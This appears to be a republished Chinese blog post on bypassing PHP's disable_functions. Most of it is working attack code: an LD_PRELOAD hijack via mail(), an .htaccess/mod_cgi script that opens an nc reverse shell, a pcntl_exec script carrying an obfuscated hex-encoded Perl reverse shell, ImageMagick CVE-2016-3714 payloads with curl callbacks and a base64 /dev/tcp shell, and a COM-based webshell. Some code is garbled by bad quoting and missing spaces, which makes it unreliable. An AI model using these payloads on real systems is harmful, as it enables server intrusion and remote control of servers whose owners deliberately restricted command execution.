PHP绕过disable_function
Posted op_hxc
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP绕过disable_function相关的知识,希望对你有一定的参考价值。
php绕过disable_function
常规绕过
- exec
exec执行command命令,但是不会输出全部结果,而是返回结果的最后一行. 想得到全部的结果,可以使用第二个参数,让其输出到一个数组,数组的每一个记录代表了输出的每一行.
<?php
exec(‘ipconfig‘,$arr);
print_r($arr)
?>
- shell_exec 是反撇号 ` 操作符的变体.
<?php
echo `ipconfig`;
- system 同passthru差不多
<?php
system(‘ipconfig‘);
- passthru
passthru直接将结果输出,不返回结果,不用使用echo查看结果.
<?php
passthru("ipconfig");
- popen popen()会调用fork()产生子进程,然后从子进程中调用/bin/sh -c来执行参数command的指令。
<?php
$file=popen(‘C:README.txt‘,‘r‘);
pclose($file);
- procopen procopen — 执行一个命令,并且打开用来输入/输出的文件指针。
<?php
$descs = array(
0 => array( ‘pipe‘ , ‘r‘ ) , #输入
1 => array( ‘file‘ , ‘output‘ , ‘w‘ ) , #输出,可以为管道或文件
2 => array( ‘file‘ , ‘errors‘ , ‘w‘ ) #错误日志,可以为管道或文件
);
$res = proc_open( ‘ipconfig‘ , $descs , $pipes );
if( is_resource( $res ) )
{
fputs( $pipes[ 0 ] , ‘<?php echo ‘Hello you!
‘; ?>‘ );
fclose( $pipes[ 0 ] );
/**
while( ! feof( $pipes[1] ) )
{
$line = fgets( $pipes[ 1 ] );
echo urlencode( $line );
}
*/
proc_close( $res );
}
相当于运行了ipconfig这个命令,我们可以打开生成的文件进行查看 7. chroot 改变当前进程的根目录为 directory,并把当前工作目录改为 "/"。
<?php
// Change root directory
chroot("/path/to/chroot/");
// Get current directory
echo getcwd();
?>
- chgrp chgrp() 函数改变指定文件的用户组。
<?php
chgrp("test.txt","admin")
?>
- putenv putenv 配置系统环境变量,getenv 取得系统的环境变量
<?php
putenv("new=very new");$is_new = getenv("new");$new="bu shi";
echo $is_new,"<br />",$new;
?>
- scandir
返回一个 array,包含有 directory 中的文件和目录。
<?php
$dir = ‘C:\‘;
$files1 = scandir($dir);
$files2=scandir($dir,1) //倒序排列
print_r($files1);
- syslog 用于向日志文件中写入消息,在这里可以规定消息的优先级、消息的输出格式等。
<?php
// open syslog, include the process ID and also send
// the log to standard error, and use a user defined
// logging mechanism
openlog("myScriptLog", LOG_PID | LOG_PERROR, LOG_LOCAL0);
// some code
if (authorized_client()) {
// do something
} else {
// unauthorized client!
// log the attempt
$access = date("Y/m/d H:i:s");
syslog(LOG_WARNING, "Unauthorized client: $access {$_SERVER[‘REMOTE_ADDR‘]} ({$_SERVER[‘HTTP_USER_AGENT‘]})");
}
closelog();
?>
- readlink 返回符号连接指向的目标。
若成功,则该函数返回连接的目标。若失败,则返回 false。
<?php
echo readlink("C:\Dell\");
- error_log 把错误消息发送到 web 服务器日志和邮件账号:
<?php
// 如果错误连接至数据库,则向服务器日志发送错误消息
if (!mysqli_connect("localhost","bad_user","bad_password","my_db")) {
error_log("Failed to connect to database!", 0);
}
// 如果用完 FOO,向管理员发送电邮
if (!($foo = allocate_new_foo())) {
error_log("Oh no! We are out of FOOs!", 1, "admin@example.com");
}
?>
利用环境变量LD_PRELOAD绕过
php的mail函数在执行过程中会默认调用系统程序/usr/sbin/sendmail,如果我们能劫持sendmail程序,再用mail函数来触发就能实现我们的目的,而我们调用的mail函数实际上是调用了系统的sendmail命令。
当 disable_functions 禁用了命令执行函数,webshell 无法执行系统命令时,可以通过环境变量 LD_PRELOAD 劫持系统函数,来突破 disable_functions 限制执行操作系统命令
程序的链接主要有以下三种:
静态链接:在程序运行之前先将各个目标模块以及所需要的库函数链接成一个完整的可执行程序,之后不再拆开。
装入时动态链接:源程序编译后所得到的一组目标模块,在装入内存时,边装入边链接。
运行时动态链接:原程序编译后得到的目标模块,在程序执行过程中需要用到时才对它进行链接。
在UNIX的动态链接库的世界中,LD_PRELOAD就是这样一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和
其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。
利用条件:
能够上传自己的.so文件
能够控制环境变量的值(设置LD_PRELOAD变量),比如putenv函数
存在可以控制PHP启动外部程序的函数并能执行(因为新进程启动将加载LD_PRELOAD中的.so文件),比如mail()、imap_mail()、mb_send_mail()和error_log()等
编写动态链接程序:
#include<stdlib.h>
#include <stdio.h>
#include<string.h>
void payload() {
system("touch/var/www/html/test");
}
int geteuid() {
if(getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}
当这个共享库中的geteuid被调用时,尝试加载payload()函数,执行命令,在/var/www/html目录下创建一个名字为test的文件。
<?php
putenv("LD_PRELOAD=/var/www/html/hack.so");
mail("adwin@localhost","","","","");
?>
gcc so相关选项
gcc -fPIC(生成位置无关代码)
gcc -shared(生成共享库,即so)
gcc -Wl,-soname(指定生成共享库的soname)
执行
gcc -c -fPIC hack.c -o hack
gcc -shared hack -o hack.so
将生成的so文件放入到我们想要放的目录当中,可以是web目录
继续编写php文件
<?php
putenv("LD_PRELOAD=/var/www/html/hack.so");
mail("adwin@localhost","","","","");
?>
将so文件写到了环境变量当中
访问index.php页面之后,目录下多出了一个test文件,执行成功了。
总结一下具体的步骤:我们利用调用mail函数来执行sendmail程序,这是系统的,此时我们可以查看一下sendmail调用哪些库函数,我们选取其中的一个库函编写一个我们自己的动态链表程序,并将他转为so文件,即生成了一个共享库,此时我们的的so文件中就定义了getuid这个函数,getuid又调用了我们附加的system功能的函数,同时还有getenv获取我们设置的LD_PRELOAD
变量,执行我们的命令,一切就绪,我们将LD_PRELOAD的变量路径设为我们so文件的路径,LD_PRELOAD
就是这样一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库,此时sendmail函数调用的getuid函数就是我们so文件里面定义的了,我们劫持了原本的函数,所以我们接下来调用mail函数就完成了最后一击。
.htaccess:不止重定向
如果.htaccess文件被攻击者修改的话,攻击者就可以利用apache的mod_cgi
模块,直接绕过PHP的任何限制,来执行系统命令。
条件:
第一,必须是apache环境。
第二,mod_cgi已经启用(在我的环境下是默认启用的)。
第三,必须允许.htaccess文件,也就是说在httpd.conf中,要注意AllowOverride选项为All,而不是none。
第四,必须有权限写.htaccess文件。
POC:
<?php
$cmd = "nc -c‘/bin/bash‘ 127.0.0.1 4444"; //反弹一个shell出来,这里用本地的4444端口
$shellfile ="#!/bin/bash
"; //指定shell
$shellfile .="echo -ne "Content-Type: text/html\n\n"
"; //需要指定这个header,否则会返回500
$shellfile .="$cmd";
functioncheckEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
echo "$text: " . ($condition ?$yes : $no) . "<br>
";
}
if(!isset($_GET[‘checked‘]))
{
@file_put_contents(‘.htaccess‘,"
SetEnv HTACCESS on", FILE_APPEND);
header(‘Location: ‘ . $_SERVER[‘PHP_SELF‘]. ‘?checked=true‘); //执行环境的检查
}
else
{
$modcgi = in_array(‘mod_cgi‘,apache_get_modules()); // 检测mod_cgi是否开启
$writable = is_writable(‘.‘); //检测当前目录是否可写
$htaccess = !empty($_SERVER[‘HTACCESS‘]);//检测是否启用了.htaccess
checkEnabled("Mod-Cgienabled",$modcgi,"Yes","No");
checkEnabled("Iswritable",$writable,"Yes","No");
checkEnabled("htaccessworking",$htaccess,"Yes","No");
if(!($modcgi && $writable&& $htaccess))
{
echo "Error. All of the above mustbe true for the script to work!"; //必须满足所有条件
}
else
{
checkEnabled("Backing
up.htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded!Saved in
.htaccess.bak","Failed!"); //备份一下原有.htaccess
checkEnabled("Write
.htaccessfile",file_put_contents(‘.htaccess‘,"Options
+ExecCGI
AddHandlercgi-script
.dizzle"),"Succeeded!","Failed!");//.dizzle,我们的特定扩展名
checkEnabled("Write shellfile",file_put_contents(‘shell.dizzle‘,$shellfile),"Succeeded!","Failed!");//写入文件
checkEnabled("Chmod777",chmod("shell.dizzle",0777),"Succeeded!","Failed!");//给权限
echo "Executing the script now.Check your listener <img src = ‘shell.dizzle‘ style =‘display:none;‘>"; //调用
}
}
?>
在本地开nc监听4444端口,然后在浏览器中打开这个页面,如果执行成功,将会反弹一个shell到4444端口.
参考文章:https://www.freebuf.com/articles/web/169156.html
pcntl_exec
pcntl是linux下的一个扩展,可以支持php的多线程操作。
pcntl_exec函数的作用是在当前进程空间执行指定程序,版本要求:PHP 4 >= 4.2.0, PHP 5
exec.php
<?php pcntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?>
/tmp/b4dboy.sh,此处就是我们想要执行的shell命令
#!/bin/bash
ls -l /
pcntl_exec反弹脚本:
<?php
/*******************************
*查看phpinfo编译参数--enable-pcntl
*作者 Spider
*nc -vvlp 443
********************************/
$ip = ‘xxx.xxx.xxx.xxx‘;
$port = ‘443‘;
$file = ‘/tmp/bc.pl‘;
header("content-Type: text/html; charset=gb2312");
if(function_exists(‘pcntl_exec‘)) {
$data = "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx20x2dx77x0dx0ax23x0dx0a".
"x0dx0ax75x73x65x20x73x74x72x69x63x74x3bx20x20x20x20x0dx0ax75x73x65x20".
"x53x6fx63x6bx65x74x3bx0dx0ax75x73x65x20x49x4fx3ax3ax48x61x6ex64x6cx65".
"x3bx0dx0ax0dx0ax6dx79x20x24x72x65x6dx6fx74x65x5fx69x70x20x3dx20x27".$ip.
"x27x3bx0dx0ax6dx79x20x24x72x65x6dx6fx74x65x5fx70x6fx72x74x20x3dx20x27".$port.
"x27x3bx0dx0ax0dx0ax6dx79x20x24x70x72x6fx74x6fx20x3dx20x67x65x74x70x72".
"x6fx74x6fx62x79x6ex61x6dx65x28x22x74x63x70x22x29x3bx0dx0ax6dx79x20x24".
"x70x61x63x6bx5fx61x64x64x72x20x3dx20x73x6fx63x6bx61x64x64x72x5fx69x6e".
"x28x24x72x65x6dx6fx74x65x5fx70x6fx72x74x2cx20x69x6ex65x74x5fx61x74x6f".
"x6ex28x24x72x65x6dx6fx74x65x5fx69x70x29x29x3bx0dx0ax6dx79x20x24x73x68".
"x65x6cx6cx20x3dx20x27x2fx62x69x6ex2fx73x68x20x2dx69x27x3bx0dx0ax73x6f".
"x63x6bx65x74x28x53x4fx43x4bx2cx20x41x46x5fx49x4ex45x54x2cx20x53x4fx43".
"x4bx5fx53x54x52x45x41x4dx2cx20x24x70x72x6fx74x6fx29x3bx0dx0ax53x54x44".
"x4fx55x54x2dx3ex61x75x74x6fx66x6cx75x73x68x28x31x29x3bx0dx0ax53x4fx43".
"x4bx2dx3ex61x75x74x6fx66x6cx75x73x68x28x31x29x3bx0dx0ax63x6fx6ex6ex65".
"x63x74x28x53x4fx43x4bx2cx24x70x61x63x6bx5fx61x64x64x72x29x20x6fx72x20".
"x64x69x65x20x22x63x61x6ex20x6ex6fx74x20x63x6fx6ex6ex65x63x74x3ax24x21".
"x22x3bx0dx0ax6fx70x65x6ex20x53x54x44x49x4ex2cx20x22x3cx26x53x4fx43x4b".
"x22x3bx0dx0ax6fx70x65x6ex20x53x54x44x4fx55x54x2cx20x22x3ex26x53x4fx43".
"x4bx22x3bx0dx0ax6fx70x65x6ex20x53x54x44x45x52x52x2cx20x22x3ex26x53x4f".
"x43x4bx22x3bx0dx0ax73x79x73x74x65x6dx28x24x73x68x65x6cx6cx29x3bx0dx0a".
"x63x6cx6fx73x65x20x53x4fx43x4bx3bx0dx0ax65x78x69x74x20x30x3bx0a";
$fp = fopen($file,‘w‘);
$key = fputs($fp,$data);
fclose($fp);
if(!$key) exit(‘写入‘.$file.‘失败‘);
chmod($file,0777);
pcntl_exec($file);
unlink($file);
} else {
echo ‘不支持pcntl扩展‘;
}
?>
2
exp.php,利用pcntl_exec来执行sh文件,从而进行shell反弹
<?php
if(function_exists(‘pcntl_exec‘))
{pcntl_exec("/bin/bash", array("/tmp/test.sh"));}
else { echo ‘pcntl extension is not support!‘;}
?>
test.sh
!/bin/bashnc -e /bin/bash 1.1.1.1 8888
利用ImageMagick漏洞绕过disable_function
ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件。
<?php
echo "Disable Functions: " . ini_get(‘disable_functions‘) . "
";
$command = PHP_SAPI == ‘cli‘ ? $argv[1] : $_GET[‘cmd‘];
if ($command == ‘‘) {
$command = ‘id‘;
}
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg"|$command")‘
pop graphic-context
EOF;
file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage(‘KKKK.mvg‘);
$thumb->writeImage(‘KKKK.png‘);
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
在ImageMagick6.9.3-9以前的所有版本中都存在一个漏洞,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入。
将其改为jpg后缀进行上传,然后侦听端口
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://127.0.0.0/joker.jpg"|curl "192.168.159.128:2233)‘
pop graphic-context
这里是反弹shell的:
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjM2LjEzOC84ODg5IDA+JjE | base64 -d | bash`"||id " )‘
pop graphic-context
例如
POST /upload.php HTTP/1.1
Host: your-ip
Content-Length: 321
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Connection: close
-----------------------------293582696224464
Content-Disposition: form-data; name="file_upload"; filename="CVE-2016-3714.jpg"
Content-Type: image/jpeg
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://127.0.0.0/joker.jpg"|curl "【your-ip】:3333)‘
pop graphic-context
-----------------------------293582696224464--
CVE-2016-3714: https://www.freebuf.com/vuls/104048.html
利用系统组件window com绕过
php5.x支持COM组件,当com.allow_dcom =true时可尝试。
poc:
<?php
$command=$_GET[‘a‘];
$wsh = new COM(‘WScript.shell‘); // 生成一个COM对Shell.Application也能
$exec = $wsh->exec("cmd /c".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
print($stroutput);
?>
以上是关于PHP绕过disable_function的主要内容,如果未能解决你的问题,请参考以下文章
LD_PRELOAD & putenv() 绕过 disable_functions & open_basedir